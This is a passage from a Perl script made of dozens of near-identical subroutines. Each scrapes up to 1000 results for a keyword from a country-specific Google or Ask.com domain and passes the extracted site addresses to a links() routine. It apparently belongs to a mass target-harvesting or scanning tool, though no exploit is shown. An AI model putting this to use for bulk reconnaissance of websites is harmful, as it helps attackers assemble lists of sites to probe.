  1985. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1986. my $link = $1;
  1987. if ($link !~ /googleIT/){
  1988. my @grep = links($link);
  1989. push(@list,@grep);
  1990. }
  1991. }
  1992. }
  1993. return @list;
  1994. }
  1995. sleep(1);
  1996. sub googleNL() {
  1997. my @list;
  1998. my $key = $_[0];
  1999. for (my $i=0; $i<=1000; $i+=100){
  2000. my $search = ("http://www.google.nl/search?q=".uri_escape($key)."&hl=&cr=countryNL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2001. my $res = &search_engine_query($search);
  2002. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2003. my $link = $1;
  2004. if ($link !~ /googleNL/){
  2005. my @grep = links($link);
  2006. push(@list,@grep);
  2007. }
  2008. }
  2009. }
  2010. return @list;
  2011. }
  2012.  
  2013. sub googleBE() {
  2014. my @list;
  2015. my $key = $_[0];
  2016. for (my $i=0; $i<=1000; $i+=100){
  2017. my $search = ("http://www.google.be/search?q=".uri_escape($key)."&hl=&cr=countryBE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2018. my $res = &search_engine_query($search);
  2019. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2020. my $link = $1;
  2021. if ($link !~ /googleBE/){
  2022. my @grep = links($link);
  2023. push(@list,@grep);
  2024. }
  2025. }
  2026. }
  2027. return @list;
  2028. }
  2029.  
  2030. sub googleCH() {
  2031. my @list;
  2032. my $key = $_[0];
  2033. for (my $i=0; $i<=1000; $i+=100){
  2034. my $search = ("http://www.google.ch/search?q=".uri_escape($key)."&hl=&cr=countryCH&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2035. my $res = &search_engine_query($search);
  2036. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2037. my $link = $1;
  2038. if ($link !~ /googleCH/){
  2039. my @grep = links($link);
  2040. push(@list,@grep);
  2041. }
  2042. }
  2043. }
  2044. return @list;
  2045. }
  2046. sleep(1);
  2047. sub googleSE() {
  2048. my @list;
  2049. my $key = $_[0];
  2050. for (my $i=0; $i<=1000; $i+=100){
  2051. my $search = ("http://www.google.se/search?q=".uri_escape($key)."&hl=&cr=countrySE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2052. my $res = &search_engine_query($search);
  2053. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2054. my $link = $1;
  2055. if ($link !~ /googleSE/){
  2056. my @grep = links($link);
  2057. push(@list,@grep);
  2058. }
  2059. }
  2060. }
  2061. return @list;
  2062. }
  2063.  
  2064. sub googleDK() {
  2065. my @list;
  2066. my $key = $_[0];
  2067. for (my $i=0; $i<=1000; $i+=100){
  2068. my $search = ("http://www.google.dk/search?q=".uri_escape($key)."&hl=&cr=countryDK&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2069. my $res = &search_engine_query($search);
  2070. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2071. my $link = $1;
  2072. if ($link !~ /googleDK/){
  2073. my @grep = links($link);
  2074. push(@list,@grep);
  2075. }
  2076. }
  2077. }
  2078. return @list;
  2079. }
  2080.  
  2081. sub googleNO() {
  2082. my @list;
  2083. my $key = $_[0];
  2084. for (my $i=0; $i<=1000; $i+=100){
  2085. my $search = ("http://www.google.no/search?q=".uri_escape($key)."&hl=&cr=countryNO&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2086. my $res = &search_engine_query($search);
  2087. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2088. my $link = $1;
  2089. if ($link !~ /googleNO/){
  2090. my @grep = links($link);
  2091. push(@list,@grep);
  2092. }
  2093. }
  2094. }
  2095. return @list;
  2096. }
  2097. sleep(1);
  2098. sub googleNZ() {
  2099. my @list;
  2100. my $key = $_[0];
  2101. for (my $i=0; $i<=1000; $i+=100){
  2102. my $search = ("http://www.google.co.nz/search?q=".uri_escape($key)."&hl=&cr=countryNZ&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2103. my $res = &search_engine_query($search);
  2104. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2105. my $link = $1;
  2106. if ($link !~ /googleNZ/){
  2107. my @grep = links($link);
  2108. push(@list,@grep);
  2109. }
  2110. }
  2111. }
  2112. return @list;
  2113. }
  2114.  
  2115. sub googleIE() {
  2116. my @list;
  2117. my $key = $_[0];
  2118. for (my $i=0; $i<=1000; $i+=100){
  2119. my $search = ("http://www.google.ie/search?q=".uri_escape($key)."&hl=&cr=countryIE&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2120. my $res = &search_engine_query($search);
  2121. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2122. my $link = $1;
  2123. if ($link !~ /googleIE/){
  2124. my @grep = links($link);
  2125. push(@list,@grep);
  2126. }
  2127. }
  2128. }
  2129. return @list;
  2130. }
  2131.  
  2132. sub googleBR() {
  2133. my @list;
  2134. my $key = $_[0];
  2135. for (my $i=0; $i<=1000; $i+=100){
  2136. my $search = ("http://www.google.com.br/search?q=".uri_escape($key)."&hl=&cr=countryBR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2137. my $res = &search_engine_query($search);
  2138. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2139. my $link = $1;
  2140. if ($link !~ /google/){
  2141. my @grep = links($link);
  2142. push(@list,@grep);
  2143. }
  2144. }
  2145. }
  2146. return @list;
  2147. }
  2148. sleep(2);
  2149. sub googleAR() {
  2150. my @list;
  2151. my $key = $_[0];
  2152. for (my $i=0; $i<=1000; $i+=100){
  2153. my $search = ("http://www.google.com.ar/search?q=".uri_escape($key)."&hl=&cr=countryAR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2154. my $res = &search_engine_query($search);
  2155. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2156. my $link = $1;
  2157. if ($link !~ /googleAR/){
  2158. my @grep = links($link);
  2159. push(@list,@grep);
  2160. }
  2161. }
  2162. }
  2163. return @list;
  2164. }
  2165.  
  2166. sub googleCO() {
  2167. my @list;
  2168. my $key = $_[0];
  2169. for (my $i=0; $i<=1000; $i+=100){
  2170. my $search = ("http://www.google.com.co/search?q=".uri_escape($key)."&hl=&cr=countryCO&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2171. my $res = &search_engine_query($search);
  2172. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2173. my $link = $1;
  2174. if ($link !~ /googleCO/){
  2175. my @grep = links($link);
  2176. push(@list,@grep);
  2177. }
  2178. }
  2179. }
  2180. return @list;
  2181. }
  2182.  
  2183. sub googleCU() {
  2184. my @list;
  2185. my $key = $_[0];
  2186. for (my $i=0; $i<=1000; $i+=100){
  2187. my $search = ("http://www.google.com.cu/search?q=".uri_escape($key)."&hl=&cr=countryCU&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2188. my $res = &search_engine_query($search);
  2189. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2190. my $link = $1;
  2191. if ($link !~ /googleCU/){
  2192. my @grep = links($link);
  2193. push(@list,@grep);
  2194. }
  2195. }
  2196. }
  2197. return @list;
  2198. }
  2199. sleep(2);
  2200. sub googleCL() {
  2201. my @list;
  2202. my $key = $_[0];
  2203. for (my $i=0; $i<=1000; $i+=100){
  2204. my $search = ("http://www.google.cl/search?q=".uri_escape($key)."&hl=&cr=countryCL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2205. my $res = &search_engine_query($search);
  2206. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2207. my $link = $1;
  2208. if ($link !~ /googleCL/){
  2209. my @grep = links($link);
  2210. push(@list,@grep);
  2211. }
  2212. }
  2213. }
  2214. return @list;
  2215. }
  2216.  
  2217. sub googleMX() {
  2218. my @list;
  2219. my $key = $_[0];
  2220. for (my $i=0; $i<=1000; $i+=100){
  2221. my $search = ("http://www.google.com.mx/search?q=".uri_escape($key)."&hl=&cr=countryMX&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2222. my $res = &search_engine_query($search);
  2223. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2224. my $link = $1;
  2225. if ($link !~ /googleMX/){
  2226. my @grep = links($link);
  2227. push(@list,@grep);
  2228. }
  2229. }
  2230. }
  2231. return @list;
  2232. }
  2233.  
  2234. sub googleAU() {
  2235. my @list;
  2236. my $key = $_[0];
  2237. for (my $i=0; $i<=1000; $i+=100){
  2238. my $search = ("http://www.google.com.au/search?q=".uri_escape($key)."&hl=&cr=countryAU&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2239. my $res = &search_engine_query($search);
  2240. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2241. my $link = $1;
  2242. if ($link !~ /googleAU/){
  2243. my @grep = links($link);
  2244. push(@list,@grep);
  2245. }
  2246. }
  2247. }
  2248. return @list;
  2249. }
  2250. sleep(2);
  2251. sub googleRU() {
  2252. my @list;
  2253. my $key = $_[0];
  2254. for (my $i=0; $i<=1000; $i+=100){
  2255. my $search = ("http://www.google.com.ru/search?q=".uri_escape($key)."&hl=&cr=countryRU&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2256. my $res = &search_engine_query($search);
  2257. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2258. my $link = $1;
  2259. if ($link !~ /googleRU/){
  2260. my @grep = links($link);
  2261. push(@list,@grep);
  2262. }
  2263. }
  2264. }
  2265. return @list;
  2266. }
  2267.  
  2268. sub googleAT() {
  2269. my @list;
  2270. my $key = $_[0];
  2271. for (my $i=0; $i<=1000; $i+=100){
  2272. my $search = ("http://www.google.at/search?q=".uri_escape($key)."&hl=&cr=countryAT&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2273. my $res = &search_engine_query($search);
  2274. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2275. my $link = $1;
  2276. if ($link !~ /googleAT/){
  2277. my @grep = links($link);
  2278. push(@list,@grep);
  2279. }
  2280. }
  2281. }
  2282. return @list;
  2283. }
  2284.  
  2285. sub googlePL() {
  2286. my @list;
  2287. my $key = $_[0];
  2288. for (my $i=0; $i<=1000; $i+=100){
  2289. my $search = ("http://www.google.pl/search?q=".uri_escape($key)."&hl=&cr=countryPL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2290. my $res = &search_engine_query($search);
  2291. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2292. my $link = $1;
  2293. if ($link !~ /googlePL/){
  2294. my @grep = links($link);
  2295. push(@list,@grep);
  2296. }
  2297. }
  2298. }
  2299. return @list;
  2300. }
  2301. sleep(3);
  2302. sub googleIL() {
  2303. my @list;
  2304. my $key = $_[0];
  2305. for (my $i=0; $i<=1000; $i+=100){
  2306. my $search = ("http://www.google.co.il/search?q=".uri_escape($key)."&hl=&cr=countryIL&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2307. my $res = &search_engine_query($search);
  2308. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2309. my $link = $1;
  2310. if ($link !~ /googleIL/){
  2311. my @grep = links($link);
  2312. push(@list,@grep);
  2313. }
  2314. }
  2315. }
  2316. return @list;
  2317. }
  2318.  
  2319. sub googleTR() {
  2320. my @list;
  2321. my $key = $_[0];
  2322. for (my $i=0; $i<=1000; $i+=100){
  2323. my $search = ("http://www.google.com.tr/search?q=".uri_escape($key)."&hl=&cr=countryTR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2324. my $res = &search_engine_query($search);
  2325. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2326. my $link = $1;
  2327. if ($link !~ /googleTR/){
  2328. my @grep = links($link);
  2329. push(@list,@grep);
  2330. }
  2331. }
  2332. }
  2333. return @list;
  2334. }
  2335.  
  2336. sub googleUA() {
  2337. my @list;
  2338. my $key = $_[0];
  2339. for (my $i=0; $i<=1000; $i+=100){
  2340. my $search = ("http://www.google.com.ua/search?q=".uri_escape($key)."&hl=&cr=countryUA&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2341. my $res = &search_engine_query($search);
  2342. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2343. my $link = $1;
  2344. if ($link !~ /googleUA/){
  2345. my @grep = links($link);
  2346. push(@list,@grep);
  2347. }
  2348. }
  2349. }
  2350. return @list;
  2351. }
  2352. sleep(3);
  2353. sub googleGR() {
  2354. my @list;
  2355. my $key = $_[0];
  2356. for (my $i=0; $i<=1000; $i+=100){
  2357. my $search = ("http://www.google.gr/search?q=".uri_escape($key)."&hl=&cr=countryGR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2358. my $res = &search_engine_query($search);
  2359. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2360. my $link = $1;
  2361. if ($link !~ /googleGR/){
  2362. my @grep = links($link);
  2363. push(@list,@grep);
  2364. }
  2365. }
  2366. }
  2367. return @list;
  2368. }
  2369.  
  2370. sub googleJP() {
  2371. my @list;
  2372. my $key = $_[0];
  2373. for (my $i=0; $i<=1000; $i+=100){
  2374. my $search = ("http://www.google.co.jp/search?q=".uri_escape($key)."&hl=&cr=countryJP&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2375. my $res = &search_engine_query($search);
  2376. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2377. my $link = $1;
  2378. if ($link !~ /googleJP/){
  2379. my @grep = links($link);
  2380. push(@list,@grep);
  2381. }
  2382. }
  2383. }
  2384. return @list;
  2385. }
  2386.  
  2387. sub googleCN() {
  2388. my @list;
  2389. my $key = $_[0];
  2390. for (my $i=0; $i<=1000; $i+=100){
  2391. my $search = ("http://www.google.cn/search?q=".uri_escape($key)."&hl=&cr=countryCN&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2392. my $res = &search_engine_query($search);
  2393. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2394. my $link = $1;
  2395. if ($link !~ /googleCN/){
  2396. my @grep = links($link);
  2397. push(@list,@grep);
  2398. }
  2399. }
  2400. }
  2401. return @list;
  2402. }
  2403. sleep(3);
  2404. sub googleMY() {
  2405. my @list;
  2406. my $key = $_[0];
  2407. for (my $i=0; $i<=1000; $i+=100){
  2408. my $search = ("http://www.google.com.my/search?q=".uri_escape($key)."&hl=&cr=countryMY&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2409. my $res = &search_engine_query($search);
  2410. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2411. my $link = $1;
  2412. if ($link !~ /googleMY/){
  2413. my @grep = links($link);
  2414. push(@list,@grep);
  2415. }
  2416. }
  2417. }
  2418. return @list;
  2419. }
  2420.  
  2421. sub googleTH() {
  2422. my @list;
  2423. my $key = $_[0];
  2424. for (my $i=0; $i<=1000; $i+=100){
  2425. my $search = ("http://www.google.co.th/search?q=".uri_escape($key)."&hl=&cr=countryTH&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2426. my $res = &search_engine_query($search);
  2427. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2428. my $link = $1;
  2429. if ($link !~ /googleTH/){
  2430. my @grep = links($link);
  2431. push(@list,@grep);
  2432. }
  2433. }
  2434. }
  2435. return @list;
  2436. }
  2437.  
  2438. sub googleIN() {
  2439. my @list;
  2440. my $key = $_[0];
  2441. for (my $i=0; $i<=1000; $i+=100){
  2442. my $search = ("http://www.google.co.in/search?q=".uri_escape($key)."&hl=&cr=countryIN&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2443. my $res = &search_engine_query($search);
  2444. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2445. my $link = $1;
  2446. if ($link !~ /googleIN/){
  2447. my @grep = links($link);
  2448. push(@list,@grep);
  2449. }
  2450. }
  2451. }
  2452. return @list;
  2453. }
  2454. sleep(3);
  2455. sub googleKR() {
  2456. my @list;
  2457. my $key = $_[0];
  2458. for (my $i=0; $i<=1000; $i+=100){
  2459. my $search = ("http://www.google.co.kr/search?q=".uri_escape($key)."&hl=&cr=countryKR&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2460. my $res = &search_engine_query($search);
  2461. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2462. my $link = $1;
  2463. if ($link !~ /googleKR/){
  2464. my @grep = links($link);
  2465. push(@list,@grep);
  2466. }
  2467. }
  2468. }
  2469. return @list;
  2470. }
  2471.  
  2472. sub googleRO() {
  2473. my @list;
  2474. my $key = $_[0];
  2475. for (my $i=0; $i<=1000; $i+=100){
  2476. my $search = ("http://www.google.ro/search?q=".uri_escape($key)."&hl=&cr=countryRO&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2477. my $res = &search_engine_query($search);
  2478. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2479. my $link = $1;
  2480. if ($link !~ /googleRO/){
  2481. my @grep = links($link);
  2482. push(@list,@grep);
  2483. }
  2484. }
  2485. }
  2486. return @list;
  2487. }
  2488.  
  2489. sub googleTW() {
  2490. my @list;
  2491. my $key = $_[0];
  2492. for (my $i=0; $i<=1000; $i+=100){
  2493. my $search = ("http://www.google.com.tw/search?q=".uri_escape($key)."&hl=&cr=countryTW&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2494. my $res = &search_engine_query($search);
  2495. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2496. my $link = $1;
  2497. if ($link !~ /googleTW/){
  2498. my @grep = links($link);
  2499. push(@list,@grep);
  2500. }
  2501. }
  2502. }
  2503. return @list;
  2504. }
  2505. sleep(3);
  2506. sub googleZA() {
  2507. my @list;
  2508. my $key = $_[0];
  2509. for (my $i=0; $i<=1000; $i+=100){
  2510. my $search = ("http://www.google.co.za/search?q=".uri_escape($key)."&hl=&cr=countryZA&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2511. my $res = &search_engine_query($search);
  2512. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2513. my $link = $1;
  2514. if ($link !~ /googleZA/){
  2515. my @grep = links($link);
  2516. push(@list,@grep);
  2517. }
  2518. }
  2519. }
  2520. return @list;
  2521. }
  2522.  
  2523. sub googlePT() {
  2524. my @list;
  2525. my $key = $_[0];
  2526. for (my $i=0; $i<=1000; $i+=100){
  2527. my $search = ("http://www.google.pt/search?q=".uri_escape($key)."&hl=&cr=countryPT&as_qdr=&num=100&filter=&start=".$i."&sa=N");
  2528. my $res = &search_engine_query($search);
  2529. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  2530. my $link = $1;
  2531. if ($link !~ /googlePT/){
  2532. my @grep = links($link);
  2533. push(@list,@grep);
  2534. }
  2535. }
  2536. }
  2537. return @list;
  2538. }
  2539.  
  2540. sub ask() {
  2541. my @list;
  2542. my $key = $_[0];
  2543. for (my $i=1; $i<=1000; $i+=100) {
  2544. my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  2545. my $res = &search_engine_query($search);
  2546. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2547. my $link = $1;
  2548. if ($link !~ /ask\.com/){
  2549. my @grep = &links($link);
  2550. push(@list,@grep);
  2551. }
  2552. }
  2553. }
  2554. return @list;
  2555. }
  2556.  
  2557. sub askCA() {
  2558. my @list;
  2559. my $key = $_[0];
  2560. for (my $i=1; $i<=100; $i+=1) {
  2561. my $search = ("http://ca.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2562. my $res = &search_engine_query($search);
  2563. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2564. my $link = $1;
  2565. if ($link !~ /askCA\.com/){
  2566. my @grep = links($link);
  2567. push(@list,@grep);
  2568. }
  2569. }
  2570. }
  2571. return @list;
  2572. }
  2573. sleep(4);
  2574. sub askDE() {
  2575. my @list;
  2576. my $key = $_[0];
  2577. for (my $i=1; $i<=100; $i+=1) {
  2578. my $search = ("http://de.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2579. my $res = &search_engine_query($search);
  2580. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2581. my $link = $1;
  2582. if ($link !~ /askDE\.com/){
  2583. my @grep = links($link);
  2584. push(@list,@grep);
  2585. }
  2586. }
  2587. }
  2588. return @list;
  2589. }
  2590.  
  2591. sub askIT() {
  2592. my @list;
  2593. my $key = $_[0];
  2594. for (my $i=1; $i<=100; $i+=1) {
  2595. my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2596. my $res = &search_engine_query($search);
  2597. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2598. my $link = $1;
  2599. if ($link !~ /askIT\.com/){
  2600. my @grep = links($link);
  2601. push(@list,@grep);
  2602. }
  2603. }
  2604. }
  2605. return @list;
  2606. }
  2607.  
  2608. sub askUK() {
  2609. my @list;
  2610. my $key = $_[0];
  2611. for (my $i=1; $i<=100; $i+=1) {
  2612. my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2613. my $res = &search_engine_query($search);
  2614. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2615. my $link = $1;
  2616. if ($link !~ /askUK\.com/){
  2617. my @grep = links($link);
  2618. push(@list,@grep);
  2619. }
  2620. }
  2621. }
  2622. return @list;
  2623. }
  2624.  
  2625. sub askFR() {
  2626. my @list;
  2627. my $key = $_[0];
  2628. for (my $i=1; $i<=100; $i+=1) {
  2629. my $search = ("http://fr.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2630. my $res = &search_engine_query($search);
  2631. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2632. my $link = $1;
  2633. if ($link !~ /askFR\.com/){
  2634. my @grep = links($link);
  2635. push(@list,@grep);
  2636. }
  2637. }
  2638. }
  2639. return @list;
  2640. }
  2641.  
  2642. sub askES() {
  2643. my @list;
  2644. my $key = $_[0];
  2645. for (my $i=1; $i<=100; $i+=1) {
  2646. my $search = ("http://es.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2647. my $res = &search_engine_query($search);
  2648. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2649. my $link = $1;
  2650. if ($link !~ /askES\.com/){
  2651. my @grep = links($link);
  2652. push(@list,@grep);
  2653. }
  2654. }
  2655. }
  2656. return @list;
  2657. }
  2658.  
  2659. sub askRU() {
  2660. my @list;
  2661. my $key = $_[0];
  2662. for (my $i=1; $i<=100; $i+=1) {
  2663. my $search = ("http://ru.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2664. my $res = &search_engine_query($search);
  2665. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2666. my $link = $1;
  2667. if ($link !~ /askRU\.com/){
  2668. my @grep = links($link);
  2669. push(@list,@grep);
  2670. }
  2671. }
  2672. }
  2673. return @list;
  2674. }
  2675. sleep(4);
  2676. sub askNL() {
  2677. my @list;
  2678. my $key = $_[0];
  2679. for (my $i=1; $i<=100; $i+=1) {
  2680. my $search = ("http://nl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2681. my $res = &search_engine_query($search);
  2682. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2683. my $link = $1;
  2684. if ($link !~ /askNL\.com/){
  2685. my @grep = links($link);
  2686. push(@list,@grep);
  2687. }
  2688. }
  2689. }
  2690. return @list;
  2691. }
  2692.  
  2693. sub askPL() {
  2694. my @list;
  2695. my $key = $_[0];
  2696. for (my $i=1; $i<=100; $i+=1) {
  2697. my $search = ("http://pl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2698. my $res = &search_engine_query($search);
  2699. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2700. my $link = $1;
  2701. if ($link !~ /askPL\.com/){
  2702. my @grep = links($link);
  2703. push(@list,@grep);
  2704. }
  2705. }
  2706. }
  2707. return @list;
  2708. }
  2709.  
  2710. sub askAT() {
  2711. my @list;
  2712. my $key = $_[0];
  2713. for (my $i=1; $i<=100; $i+=1) {
  2714. my $search = ("http://at.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2715. my $res = &search_engine_query($search);
  2716. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2717. my $link = $1;
  2718. if ($link !~ /askAT\.com/){
  2719. my @grep = links($link);
  2720. push(@list,@grep);
  2721. }
  2722. }
  2723. }
  2724. return @list;
  2725. }
  2726.  
  2727. sub askSE() {
  2728. my @list;
  2729. my $key = $_[0];
  2730. for (my $i=1; $i<=100; $i+=1) {
  2731. my $search = ("http://se.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2732. my $res = &search_engine_query($search);
  2733. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2734. my $link = $1;
  2735. if ($link !~ /askSE\.com/){
  2736. my @grep = links($link);
  2737. push(@list,@grep);
  2738. }
  2739. }
  2740. }
  2741. return @list;
  2742. }
  2743.  
  2744. sub askDK() {
  2745. my @list;
  2746. my $key = $_[0];
  2747. for (my $i=1; $i<=100; $i+=1) {
  2748. my $search = ("http://dk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2749. my $res = &search_engine_query($search);
  2750. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2751. my $link = $1;
  2752. if ($link !~ /askDK\.com/){
  2753. my @grep = links($link);
  2754. push(@list,@grep);
  2755. }
  2756. }
  2757. }
  2758. return @list;
  2759. }
  2760.  
  2761. sub askNO() {
  2762. my @list;
  2763. my $key = $_[0];
  2764. for (my $i=1; $i<=100; $i+=1) {
  2765. my $search = ("http://no.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2766. my $res = &search_engine_query($search);
  2767. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2768. my $link = $1;
  2769. if ($link !~ /askNO\.com/){
  2770. my @grep = links($link);
  2771. push(@list,@grep);
  2772. }
  2773. }
  2774. }
  2775. return @list;
  2776. }
  2777. sleep(4);
  2778. sub askAU() {
  2779. my @list;
  2780. my $key = $_[0];
  2781. for (my $i=1; $i<=100; $i+=1) {
  2782. my $search = ("http://au.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2783. my $res = &search_engine_query($search);
  2784. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2785. my $link = $1;
  2786. if ($link !~ /askAU\.com/){
  2787. my @grep = links($link);
  2788. push(@list,@grep);
  2789. }
  2790. }
  2791. }
  2792. return @list;
  2793. }
  2794.  
  2795. sub askBR() {
  2796. my @list;
  2797. my $key = $_[0];
  2798. for (my $i=1; $i<=100; $i+=1) {
  2799. my $search = ("http://br.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2800. my $res = &search_engine_query($search);
  2801. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2802. my $link = $1;
  2803. if ($link !~ /askBR\.com/){
  2804. my @grep = links($link);
  2805. push(@list,@grep);
  2806. }
  2807. }
  2808. }
  2809. return @list;
  2810. }
  2811.  
  2812. sub askMX() {
  2813. my @list;
  2814. my $key = $_[0];
  2815. for (my $i=1; $i<=100; $i+=1) {
  2816. my $search = ("http://mx.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
